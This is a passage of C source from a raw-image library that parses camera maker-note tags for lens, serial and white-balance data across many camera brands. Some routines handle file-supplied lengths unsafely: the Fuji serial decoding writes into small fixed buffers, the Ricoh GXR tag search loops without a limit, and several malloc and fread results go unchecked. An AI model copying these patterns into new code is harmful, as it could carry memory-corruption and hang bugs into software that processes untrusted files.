memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len) {
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (saneSonyCameraInfo(table_buf[0], table_buf[3], table_buf[2], table_buf[5], table_buf[4], table_buf[7]))
{
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
              if (table_buf[7])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
}
break;
default:
// CameraInfo2 & 3
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
}
free(table_buf);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 65535) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len < 256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
free(table_buf);
}
}
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
#else
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
/*placeholder */
}
#endif
void CLASS parse_makernote (int base, int uptag)
{
unsigned offset=0, entries, tag, type, len, save, c;
unsigned ver97=0, serial=0, i, wbi=0, wb[4]={0,0,0,0};
uchar buf97[324], ci, cj, ck;
short morder, sorder=order;
char buf[10];
unsigned SamsungKey[11];
uchar NikonKey;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
INT64 fsize = ifp->size();
#endif
/*
The MakerNote might have its own TIFF header (possibly with
its own byte-order!), or it might just be a table.
*/
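  /* Signatures handled below: "Nikon" carries a full embedded TIFF header (own byte order
     and IFD offset); "OLYMPUS"/"PENTAX " bring their own byte-order mark; "SONY",
     "Panasonic" and "FUJIFILM" are forced little-endian; the remaining prefixes are plain
     tag tables reached by seeking back a few bytes. */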
if (!strncmp(make,"Nokia",5)) return;
fread (buf, 1, 10, ifp);
if (!strncmp (buf,"KDK" ,3) || /* these aren't TIFF tables */
!strncmp (buf,"VER" ,3) ||
!strncmp (buf,"IIII",4) ||
!strncmp (buf,"MMMM",4)) return;
if (!strncmp (buf,"KC" ,2) || /* Konica KD-400Z, KD-510Z */
!strncmp (buf,"MLY" ,3)) { /* Minolta DiMAGE G series */
order = 0x4d4d;
while ((i=ftell(ifp)) < data_offset && i < 16384) {
wb[0] = wb[2]; wb[2] = wb[1]; wb[1] = wb[3];
wb[3] = get2();
if (wb[1] == 256 && wb[3] == 256 &&
wb[0] > 256 && wb[0] < 640 && wb[2] > 256 && wb[2] < 640)
FORC4 cam_mul[c] = wb[c];
}
goto quit;
}
if (!strcmp (buf,"Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek (ifp, offset-8, SEEK_CUR);
} else if (!strcmp (buf,"OLYMPUS") ||
!strcmp (buf,"PENTAX ")) {
base = ftell(ifp)-10;
fseek (ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
} else if (!strncmp (buf,"SONY",4) ||
!strcmp (buf,"Panasonic")) {
goto nf;
} else if (!strncmp (buf,"FUJIFILM",8)) {
base = ftell(ifp)-10;
nf: order = 0x4949;
fseek (ifp, 2, SEEK_CUR);
} else if (!strcmp (buf,"OLYMP") ||
!strcmp (buf,"LEICA") ||
!strcmp (buf,"Ricoh") ||
!strcmp (buf,"EPSON"))
fseek (ifp, -2, SEEK_CUR);
else if (!strcmp (buf,"AOC") ||
!strcmp (buf,"QVC"))
fseek (ifp, -4, SEEK_CUR);
else {
fseek (ifp, -10, SEEK_CUR);
if (!strncmp(make,"SAMSUNG",7))
base = ftell(ifp);
}
// adjust pos & base for Leica M8/M9/M Mono tags and dir in tag 0x3400
if (!strncasecmp(make, "LEICA", 5))
{
if (!strncmp(model, "M8", 2) ||
!strncasecmp(model, "Leica M8", 8) ||
!strncasecmp(model, "LEICA X", 7))
{
base = ftell(ifp)-8;
}
else if (!strncasecmp(model, "LEICA M (Typ 240)", 17))
{
base = 0;
}
else if (!strncmp(model, "M9", 2) ||
!strncasecmp(model, "Leica M9", 8) ||
!strncasecmp(model, "M Monochrom", 11) ||
!strncasecmp(model, "Leica M Monochrom", 11))
{
if (!uptag)
{
base = ftell(ifp) - 10;
fseek (ifp, 8, SEEK_CUR);
}
else if (uptag == 0x3400)
{
fseek (ifp, 10, SEEK_CUR);
base += 10;
}
}
else if (!strncasecmp(model, "LEICA T", 7))
{
base = ftell(ifp)-8;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_T;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
else if (!strncasecmp(model, "LEICA SL", 8))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_SL;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
#endif
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get (base, &tag, &type, &len, &save);
tag |= uptag << 16;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos = ftell(ifp);
    if(len > 8 && _pos+len > 2* fsize)
    {
      fseek(ifp, save, SEEK_SET); // restore the IFD read position before skipping this oversized tag
      continue;
    }
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4)) {
if (tag == 0x0010) {
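        // Fujifilm tag 0x0010: internal serial string. Words longer than 17 characters embed
        // a hex-coded model string, a YYMMDD manufacturing date and the serial proper; the code
        // below decodes the hex prefix into model2 and rebuilds InternalBodySerial from the parts.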
char FujiSerial[sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
char yy[2], mm[3], dd[3], ystr[16], ynum[16];
int year, nwords, ynum_len;
unsigned c;
stmread(FujiSerial, len, ifp);
nwords = getwords(FujiSerial, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
for (int i = 0; i < nwords; i++) {
mm[2] = dd[2] = 0;
if (strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1) < 18)
if (i == 0)
strncpy (imgdata.shootinginfo.InternalBodySerial,
words[0],
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
else
{
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf), "%s %s",
imgdata.shootinginfo.InternalBodySerial, words[i]);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
else
{
strncpy (dd, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-14, 2);
strncpy (mm, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-16, 2);
strncpy (yy, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18, 2);
year = (yy[0]-'0')*10 + (yy[1]-'0');
if (year <70) year += 2000; else year += 1900;
ynum_len = (int)strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18;
strncpy(ynum, words[i], ynum_len);
ynum[ynum_len] = 0;
for ( int j = 0; ynum[j] && ynum[j+1] && sscanf(ynum+j, "%2x", &c); j += 2) ystr[j/2] = c;
ystr[ynum_len / 2 + 1] = 0;
strcpy (model2, ystr);
if (i == 0) {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
if (nwords == 1)
snprintf (tbuf,sizeof(tbuf),
"%s %s %d:%s:%s",
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12,
ystr, year, mm, dd);
else
snprintf (tbuf,sizeof(tbuf),
"%s %d:%s:%s %s",
ystr, year, mm, dd,
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
} else {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf),
"%s %s %d:%s:%s %s",
imgdata.shootinginfo.InternalBodySerial, ystr, year, mm, dd,
words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
}
}
}
else
parseFujiMakernotes (tag, type);
}
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len, ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON",5))
{
if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0012)
{
char a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c) imgdata.other.FlashEC = (float)(a*b)/(float)c;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData>0)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0x00a0)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
switch (tag) {
case 0x0404:
case 0x101a:
case 0x20100101:
if (!imgdata.shootinginfo.BodySerial[0])
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0x20100102:
if (!imgdata.shootinginfo.InternalBodySerial[0])
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20401112:
imgdata.makernotes.olympus.OlympusCropID = get2();
break;
case 0x20401113:
FORC4 imgdata.makernotes.olympus.OlympusFrame[c] = get2();
break;
case 0x20100201:
{
unsigned long long oly_lensid [3];
oly_lensid[0] = fgetc(ifp);
fgetc(ifp);
oly_lensid[1] = fgetc(ifp);
oly_lensid[2] = fgetc(ifp);
imgdata.lens.makernotes.LensID =
(oly_lensid[0] << 16) | (oly_lensid[1] << 8) | oly_lensid[2];
}
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
break;
}
}
else if ((!strncmp(make, "PENTAX", 6) || !strncmp(make, "RICOH", 5)) &&
!strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
char buffer[17];
int count=0;
fread(buffer, 16, 1, ifp);
buffer[16] = 0;
for (int i=0; i<16; i++)
{
// sprintf(imgdata.shootinginfo.InternalBodySerial+2*i, "%02x", buffer[i]);
if ((isspace(buffer[i])) ||
(buffer[i] == 0x2D) ||
(isalnum(buffer[i])))
count++;
}
if (count == 16)
{
sprintf (imgdata.shootinginfo.BodySerial, "%8s", buffer+8);
buffer[8] = 0;
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else
{
sprintf (imgdata.shootinginfo.BodySerial, "%02x%02x%02x%02x", buffer[4], buffer[5], buffer[6], buffer[7]);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%02x%02x%02x%02x", buffer[8], buffer[9], buffer[10], buffer[11]);
}
}
else if ((tag == 0x1001) && (type == 3))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
imgdata.lens.makernotes.FocalType = 1;
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
}
else if (!strncmp(make, "RICOH", 5) &&
strncmp(model, "PENTAX", 6))
{
if ((tag == 0x0005) && !strncmp(model, "GXR", 3))
{
char buffer[9];
buffer[8] = 0;
fread(buffer, 8, 1, ifp);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
else if ((tag == 0x2001) && !strncmp(model, "GXR", 3))
{
short ntags, cur_tag;
fseek(ifp, 20, SEEK_CUR);
ntags = get2();
cur_tag = get2();
while (cur_tag != 0x002c)
{
fseek(ifp, 10, SEEK_CUR);
cur_tag = get2();
}
fseek(ifp, 6, SEEK_CUR);
fseek(ifp, get4()+20, SEEK_SET);
stread(imgdata.shootinginfo.BodySerial, 12, ifp);
get2();
imgdata.lens.makernotes.LensID = getc(ifp) - '0';
switch(imgdata.lens.makernotes.LensID) {
case 1:
case 2:
case 3:
case 5:
case 6:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_RicohModule;
break;
case 8:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
break;
default:
imgdata.lens.makernotes.LensID = -1;
}
fseek(ifp, 17, SEEK_CUR);
stread(imgdata.lens.LensSerial, 12, ifp);
}
}
else if ((!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && dng_version)) &&
strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 2, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
unique_id = imgdata.lens.makernotes.CamID = get4();
}
else if (tag == 0xa002)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
